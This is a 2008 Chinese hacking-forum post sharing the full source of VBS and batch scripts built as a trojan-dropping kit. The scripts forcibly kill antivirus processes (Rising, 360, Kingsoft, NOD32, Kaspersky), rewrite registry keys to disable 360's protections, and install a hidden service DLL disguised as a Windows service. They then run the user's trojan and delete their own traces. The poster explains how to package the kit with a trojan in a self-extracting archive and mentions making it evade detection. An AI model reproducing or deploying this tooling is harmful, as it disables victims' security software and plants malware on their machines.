一个可以干掉瑞星,金山,nod32,360的Xx

6940878 · 发表于 2008-8-20 17:48:23

一个可以干掉瑞星,金山,nod32,360的Xx
这里有到了两个bat和两个vbs+一个kill.exe

下面是源码:

setdt.vbs的源码:

set Cleaner=createobject(\"wscript.shell\")
Cleaner.run \"setdt.bat\",vbhide

.......
setdt.bat的源码:

@ECHO OFF
@date /t>C:\\time.txt
date 1988-09-18
hide.vbs
@date <C:\\time.txt
del %SystemRoot%\\system32\\setdt.vbs
del %SystemRoot%\\system32\\hide.vbs
del %SystemRoot%\\system32\\command.exe
del %SystemRoot%\\system32\\xKill.exe
del %SystemRoot%\\system32\\xkill.bat
del C:\\time.txt
del %0

..................

hide.vbs的源码:

dim shell
set shell=CreateObject(\"Wscript.Shell\")
WScript.Sleep 10***00
shell.run \"cmd /c start %SystemRoot%\\system32\\xKill.exe\",0
set Cleaner=createobject(\"wscript.shell\")
Cleaner.run \"xkill.bat\",vbhide
WScript.Sleep 10***00
shell.run \"cmd /c start %SystemRoot%\\system32\\command.exe\",0

......................

xkill.bat的源码:

@echo off
taskkill /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\360Safe\\safemon]>>kill.reg
echo \"MonAccess\"=dword:000****0000>>kill.reg
echo \"SiteAccess\"=dword:000****0000>>kill.reg
echo \"ExecAccess\"=dword:000****0000>>kill.reg
echo \"UDiskAccess\"=dword:000****0000>>kill.reg
echo \"LeakShowed\"=dword:000****0000>>kill.reg
sc create DARK binpath= %windir%\\System32\\darkkill.dll
sc config DARK start= disabled
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DARK]>>dark.reg
echo \"Type\"=dword:000****0110>>dark.reg
echo \"Start\"=dword:000****0002>>dark.reg
echo \"ErrorControl\"=dword:000****0001>>dark.reg
echo \"ImagePath\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\\>>dark.reg
echo74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\\>>dark.reg
echo00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\\>>dark.reg
echo6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo \"DisplayName\"=\"Background Intelligent Transfer Service\">>dark.reg
echo \"DependOnService\"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo \"DependOnGroup\"=hex(7):00,00>>dark.reg
echo \"ObjectName\"=\"LocalSystem\">>dark.reg
echo \"Description\"=hex(2):00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DARK\\Parameters]>>dark.reg
echo \"ServiceDll\"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\\>>dark.reg
echo00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\\>>dark.reg
echo72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DARK\\Security]>>dark.reg
echo \"Security\"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\\>>dark.reg
echo00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\\>>dark.reg
echo00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\\>>dark.reg
echo05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\\>>dark.reg
echo20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\\>>dark.reg
echo00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\\>>dark.reg
echo00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DARK\\Enum]>>dark.reg
echo \"0\"=\"Root\\\\LEGACY_DARK\\\\0000\">>dark.reg
echo \"Count\"=dword:000****0001>>dark.reg
echo \"NextInstance\"=dword:000****0001>>dark.reg
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\\System32\\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\\System32\\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0

本人不会编程,所以只好从vbs和bat入手了,感觉还不错.
至于xkill.exe,一个朋友给我的加壳软件,他说这壳有后门,让我看看能不能给去了

我迷迷糊糊的把核心部分给提取了出来,又做了免杀处理.

xkill.exe直接运行后可以结束掉瑞星,nod32,金山,其他没测试过.

不过还是建议你把xkill.exe和我这几个vbs,bat一起使用,这样还可以干掉360和卡卡,应该还可以破坏卡巴的主动防御

如果你问我为什么不装个卡巴试试,那么我机子上已经装了5个安全软件了,再装个卡巴实在受不了~~

大家不要把xkill.exe上传到杀毒网上试试,曾经有一份真挚的免杀马摆在我的面前,我没有去珍惜.把它上传到杀毒网上www.virustotal.com,结果........

这个小工具请解压后,将你的马复制到解压目录,并重命名为command.exe,然后用winrar打包生成自解压文件,选择解压后运行setdt.vbs

马上就要上初3了,学校一个星期才放一天假,开学后长期未登陆的话,希望管理员不要删我的号~

工具md5值:9566b78aa41***70b148f90baa137e7de

账号		自动登录	找回密码
密码			开放注册